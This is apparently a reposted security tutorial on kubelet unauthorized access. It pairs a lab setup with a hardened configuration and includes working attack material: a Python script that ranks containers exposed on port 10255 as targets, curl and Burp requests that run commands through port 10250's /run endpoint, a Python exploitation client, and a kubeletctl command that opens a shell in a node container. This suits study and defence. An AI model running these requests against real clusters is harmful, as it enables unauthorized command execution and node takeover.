Cloud security: kubelet unauthorized access

0x00 Preface

Unauthorized access has always been a common class of vulnerability, and cloud-native environments are no exception. This article walks through the unauthorized-access issues of kubelet: the unauthenticated read-only port 10255 (information disclosure) and the main API port 10250 when anonymous access is combined with AlwaysAllow authorization (remote command execution in every container on the node).

0x01 kubelet basics

1. Main functions

kubelet is the node agent that runs on every k8s worker node. Its main functions are:

  • It talks to the apiserver: it watches for the pods scheduled to its node and picks up pod changes (create, update, delete).
  • It manages the resources of the host it runs on and starts, monitors and stops the pods' containers through the container runtime.

2. Ports

kubelet historically listened on four ports: 10250, 10255, 10248 and 4194 (the cAdvisor port, removed in version 1.12; its data is now served through 10250).

port   effect
10250  The kubelet's main API port, served over HTTPS. The apiserver connects to it for kubectl exec/logs/port-forward and to read node and pod status. Through it you can list the pods on the node, read container logs and, as shown in 0x03, execute commands in containers. Authentication and authorization are configurable; this is the port whose misconfiguration leads to command execution.
10248  Health check port (/healthz), bound to localhost by default. It only tells you whether kubelet itself is running.
4194   cAdvisor port: environment information about the node and the resource usage of the containers running on it. Removed in 1.12; the data is served under /stats and /metrics on 10250 instead.
10255  Read-only port serving pod and node information (/pods, /metrics, /stats, ...). No authentication or authorization is required. It is disabled by default (readOnlyPort: 0) in current kubelet versions and must be turned on explicitly.

3. kubelet modules

(The original post shows an architecture diagram of the kubelet's internal modules here; the image is not reproduced.)

0x02 Port 10255 unauthorized access

1. Environment setup

Edit /var/lib/kubelet/config.yaml (the KubeletConfiguration written by kubeadm) and append the following two lines, which enable the read-only port and bind it to all interfaces:

readOnlyPort: 10255
address: 0.0.0.0

Then restart kubelet:

systemctl restart kubelet

2. Exploitation

10255 is a read-only port, so the impact is information disclosure only; nothing can be executed through it. Plain HTTP (not HTTPS) is used, and no credentials are needed. The leaked information includes node information, the namespaces and pod names present on the node, and the pods' startup configuration (container images, command lines and arguments, environment variables, mounted volumes and secret names) from http://<node>:10255/pods. The namespace/pod/container triples recovered here are exactly what the /run endpoint on port 10250 needs in 0x03.
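As an added example (not code from the original post), the following Python script turns the /pods response of the read-only port into the list of namespace/pod/container triples that the 10250 /run endpoint expects, and flags the containers an attacker would try first (privileged, host PID/network namespace, hostPath mounts). The embedded JSON is a constructed, trimmed sample in the shape of a v1.PodList; the node address 192.168.247.156 is the lab node used in the article.

```python
"""Parse the kubelet read-only port's /pods response into exploitation targets.

Added example, not part of the original post. SAMPLE_PODS is a constructed,
trimmed sample in the shape the kubelet returns from GET /pods (a v1.PodList).
"""
import json
import urllib.request

# Constructed sample: what GET http://<node>:10255/pods returns, trimmed.
SAMPLE_PODS = json.dumps({
    "kind": "PodList",
    "items": [
        {
            "metadata": {"name": "kube-proxy-flbc8", "namespace": "kube-system"},
            "spec": {
                "hostNetwork": True,
                "volumes": [{"name": "lib-modules", "hostPath": {"path": "/lib/modules"}}],
                "containers": [{
                    "name": "kube-proxy",
                    "image": "registry.k8s.io/kube-proxy:v1.26.3",
                    "command": ["/usr/local/bin/kube-proxy",
                                "--config=/var/lib/kube-proxy/config.conf"],
                    "securityContext": {"privileged": True},
                }],
            },
        },
        {
            "metadata": {"name": "web-7d9f", "namespace": "default"},
            "spec": {
                "volumes": [{"name": "tls", "secret": {"secretName": "web-tls"}}],
                "containers": [{"name": "nginx", "image": "nginx:1.25"}],
            },
        },
    ],
})


def fetch_pods(node, port=10255):
    """Live mode: GET /pods from the read-only port (plain HTTP, no credentials)."""
    with urllib.request.urlopen(f"http://{node}:{port}/pods", timeout=5) as resp:
        return resp.read().decode()


def extract_targets(pods_json):
    """Return one dict per container: the /run path components plus risk flags."""
    targets = []
    for pod in json.loads(pods_json).get("items", []):
        meta, spec = pod["metadata"], pod["spec"]
        volumes = spec.get("volumes", [])
        host_paths = [v["hostPath"]["path"] for v in volumes if "hostPath" in v]
        secrets = [v["secret"]["secretName"] for v in volumes if "secret" in v]
        for c in spec.get("containers", []):
            sc = c.get("securityContext") or {}
            targets.append({
                # Path used by POST https://<node>:10250/run/<ns>/<pod>/<container>
                "run_path": f"/run/{meta['namespace']}/{meta['name']}/{c['name']}",
                "image": c.get("image"),
                "command": c.get("command", []) + c.get("args", []),
                "privileged": bool(sc.get("privileged")),
                "host_network": bool(spec.get("hostNetwork")),
                "host_pid": bool(spec.get("hostPID")),
                "host_paths": host_paths,
                "secrets": secrets,
            })
    return targets


def rank_targets(targets):
    """Privileged and host-namespace containers first: a shell there is close to a node shell."""
    def score(t):
        return (t["privileged"], t["host_pid"], t["host_network"], len(t["host_paths"]))
    return sorted(targets, key=score, reverse=True)


if __name__ == "__main__":
    import sys
    # With a node address on the command line the live port is queried;
    # without one the constructed sample is parsed.
    data = fetch_pods(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_PODS
    for t in rank_targets(extract_targets(data)):
        flags = [k for k in ("privileged", "host_pid", "host_network") if t[k]]
        print(f"{t['run_path']:55} {t['image']:35} {','.join(flags) or '-'}")
```

Run it as `python3 pods_targets.py 192.168.247.156` against the lab node, or with no argument to see the parsing on the constructed sample. The ranking is deliberately simple: a privileged container with hostPath mounts is the shortest path from "command execution in a container" to "command execution on the node".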

0x03 Port 10250 unauthorized access

1. Environment setup

Edit /var/lib/kubelet/config.yaml: under authentication.anonymous, set enabled to true, so that requests without credentials are accepted as the user system:anonymous.

Then change authorization.mode from Webhook to AlwaysAllow, so that every authenticated request, including anonymous ones, is authorized. Either setting on its own is not enough: with anonymous access but Webhook authorization the apiserver's RBAC still denies system:anonymous, and with anonymous access disabled the request is rejected before authorization is consulted.

Then restart kubelet:

systemctl restart kubelet
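For reference, the two relevant blocks of the KubeletConfiguration, first as the article's lab sets them up and then with the kubeadm defaults restored. This is an added example, not the article's own config file; the clientCAFile path is the standard kubeadm location and is assumed.

```yaml
# --- vulnerable: what this lab sets up in /var/lib/kubelet/config.yaml ---
apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
address: 0.0.0.0
readOnlyPort: 10255          # unauthenticated read-only API on 10255 (0x02)
authentication:
  anonymous:
    enabled: true            # requests without credentials become system:anonymous
  webhook:
    enabled: true
authorization:
  mode: AlwaysAllow          # every authenticated request is allowed, anonymous included
---
# --- hardened: the kubeadm defaults ---
apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
readOnlyPort: 0              # 10255 is not served at all
authentication:
  anonymous:
    enabled: false           # no system:anonymous identity; unauthenticated -> 401
  webhook:
    enabled: true            # bearer tokens validated via TokenReview at the apiserver
  x509:
    clientCAFile: /etc/kubernetes/pki/ca.crt   # assumed kubeadm path for client-cert auth
authorization:
  mode: Webhook              # SubjectAccessReview at the apiserver; needs RBAC on nodes/proxy etc.
```

After `systemctl restart kubelet`, an unauthenticated `curl -sk https://<node>:10250/pods` should return 401 Unauthorized with the hardened config; a 403 Forbidden instead means anonymous access is still enabled and only the Webhook authorizer is stopping the request.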

2. Exploitation

First, access https://192.168.247.156:10250/runningpods/ directly to list the pods running on the node. Note that this port speaks HTTPS with a certificate your client will not trust, so use https:// and skip certificate verification (curl -k); a plain http:// request is rejected.

2.1 Command execution

curl -XPOST -k "https://192.168.247.156:10250/run/kube-system/kube-proxy-flbc8/kube-proxy" -d "cmd=whoami"

The path is /run/{namespace}/{pod}/{container}; the command goes in the cmd form field and runs inside that container.

You can also send the request directly from Burp:

POST /run/kube-system/kube-proxy-flbc8/kube-proxy HTTP/1.1
Host: 192.168.247.156:10250
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: sidebar_collapsed=false
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/x-www-form-urlencoded
Content-Length: 6

cmd=id
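The same exchange as a small Python client, added here as an example (not code from the original post). Besides replaying the POST to /run, it classifies the kubelet's auth posture from the status of an unauthenticated GET /pods, since the response differs between "anonymous disabled" (401) and "anonymous enabled but denied by the Webhook authorizer" (403). The node address, pod and container names are the ones used in the article; the script does no network I/O unless main() is run.

```python
"""Probe and use the kubelet API on 10250 over HTTPS.

Added example, not from the original post. NODE and the pod/container names
are the lab values from the article.
"""
import ssl
import urllib.error
import urllib.parse
import urllib.request

NODE = "192.168.247.156"
PORT = 10250

# The kubelet serving certificate is not trusted by the client, which is why
# the article's curl needs -k; this context does the same thing.
_INSECURE = ssl.create_default_context()
_INSECURE.check_hostname = False
_INSECURE.verify_mode = ssl.CERT_NONE


def run_url(node, namespace, pod, container, port=PORT):
    """Build the /run/{namespace}/{pod}/{container} URL used for command execution."""
    path = "/".join(urllib.parse.quote(p, safe="") for p in (namespace, pod, container))
    return f"https://{node}:{port}/run/{path}"


def classify(status):
    """Map the status of an unauthenticated request to the kubelet's auth posture."""
    if status == 200:
        return "anonymous allowed + authorized (AlwaysAllow): unauthenticated RCE"
    if status == 401:
        return "anonymous disabled: authentication enforced"
    if status == 403:
        return "anonymous accepted but denied by authorization (Webhook/RBAC)"
    return f"unexpected status {status}"


def request(url, data=None, token=None, timeout=5):
    """Return (status, body) without raising on 4xx so probes can be classified."""
    req = urllib.request.Request(url, data=data, method="POST" if data is not None else "GET")
    if token:
        req.add_header("Authorization", f"Bearer {token}")
    try:
        with urllib.request.urlopen(req, context=_INSECURE, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


def run_command(node, namespace, pod, container, cmd, token=None):
    """POST cmd=<command> to /run, the same request the article's curl sends."""
    body = urllib.parse.urlencode({"cmd": cmd}).encode()
    return request(run_url(node, namespace, pod, container), data=body, token=token)


def main():
    status, _ = request(f"https://{NODE}:{PORT}/pods")
    print(f"GET /pods -> {status}: {classify(status)}")
    if status == 200:
        status, out = run_command(NODE, "kube-system", "kube-proxy-flbc8", "kube-proxy", "id")
        print(f"POST /run -> {status}\n{out}")


if __name__ == "__main__":
    main()
```

The token parameter exists because the same endpoint is legitimately reachable with a service-account token that RBAC grants nodes/proxy on: a 403 on the anonymous probe does not mean the node is safe if a token from a compromised pod can be replayed against it.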


2.2 Obtaining a shell on the node

https://github.com/cyberark/kubeletctl

This tool is very handy: it wraps the 10250 endpoints (pods, run, exec, logs) and also has a scan mode (kubeletctl scan rce) that checks which containers on a node accept command execution.

kubeletctl.exe --server 192.168.247.156 -p kube-flannel-ds-jndfl -c kube-flannel -n kube-flannel exec "/bin/bash"

This gives an interactive shell in the kube-flannel container of the CNI DaemonSet on that node, which the article uses to obtain node-level access.


Source: blog.csdn.net/qq_36869808/article/details/130064037